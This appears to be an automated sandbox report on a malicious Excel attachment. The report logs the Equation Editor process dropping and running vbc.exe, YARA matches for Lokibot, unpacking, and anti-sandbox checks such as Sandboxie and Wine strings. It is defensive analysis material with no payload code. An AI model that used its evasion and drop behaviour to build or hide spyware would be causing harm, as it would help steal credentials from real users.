Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00370404 NtQueryInformationProcess,

4_2_00370404

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0037A028	4_2_0037A028
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0037801F	4_2_0037801F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0037E868	4_2_0037E868
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003730A8	4_2_003730A8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003704D0	4_2_003704D0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00372198	4_2_00372198
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0037EAC8	4_2_0037EAC8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00370FC0	4_2_00370FC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00379028	4_2_00379028
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00374008	4_2_00374008
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00375850	4_2_00375850
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00375458	4_2_00375458
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00375448	4_2_00375448
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00375268	4_2_00375268
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00375648	4_2_00375648
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00374ED0	4_2_00374ED0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003782D8	4_2_003782D8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0037A345	4_2_0037A345
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00374BB1	4_2_00374BB1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00374BC0	4_2_00374BC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006E3410	4_2_006E3410
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006E7694	4_2_006E7694
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006E4D3A	4_2_006E4D3A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006E0048	4_2_006E0048
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006E0022	4_2_006E0022
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006E3400	4_2_006E3400
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006EBEDE	4_2_006EBEDE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006EDCA8	4_2_006EDCA8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006E60A9	4_2_006E60A9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006E60B8	4_2_006E60B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006EDC98	4_2_006EDC98
Source: C:\Users\Public\vbc.exe	Code function: 4_2_045F22E9	4_2_045F22E9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_045F230A	4_2_045F230A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_045F053C	4_2_045F053C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_045F09CE	4_2_045F09CE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040549C	5_2_0040549C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004029D4	5_2_004029D4

Source: MV NAGOYA TRADER.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\Public\vbc.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Users\Public\vbc.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research

Source: svchost[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/8@182/2

Source: C:\Users\Public\vbc.exe

Code function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

5_2_0040650A

Source: C:\Users\Public\vbc.exe

Code function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

5_2_0040434D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$MV NAGOYA TRADER.xlsx

Jump to behavior

Source: C:\Users\Public\vbc.exe

Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR223F.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: MV NAGOYA TRADER.xlsx	Virustotal: Detection: 31%
Source: MV NAGOYA TRADER.xlsx	ReversingLabs: Detection: 25%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: MV NAGOYA TRADER.xlsx

Static file information: File size 2653184 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: MV NAGOYA TRADER.xlsx

Initial sample: OLE indicators vbamacros = False

Source: MV NAGOYA TRADER.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\Public\vbc.exe

Unpacked PE file: 4.2.vbc.exe.e80000.2.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\Public\vbc.exe

Unpacked PE file: 4.2.vbc.exe.e80000.2.unpack

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0x8BB156F3 [Thu Apr 7 15:19:15 2044 UTC]

Yara detected aPLib compressed binary

Show sources

Source: Yara match	File source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3040, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2952, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00378799 push ebx; retf	4_2_0037879A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006E93AA pushfd ; iretd	4_2_006E93AB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006EABA4 push ecx; retf	4_2_006EABA5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_045F0EBF pushfd ; retf	4_2_045F0EC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402AC0 push eax; ret	5_2_00402AD4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402AC0 push eax; ret	5_2_00402AFC

Source: initial sample	Static PE information: section name: .text entropy: 7.32253552391
Source: initial sample	Static PE information: section name: .text entropy: 7.32253552391

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: MV NAGOYA TRADER.xlsx

Stream path 'EncryptedPackage' entropy: 7.99993139379 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000004.00000002.2195981464.0000000002377000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2952, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME8
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL8

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1616	Thread sleep time: -300000s >= -30000s	Jump to behavior
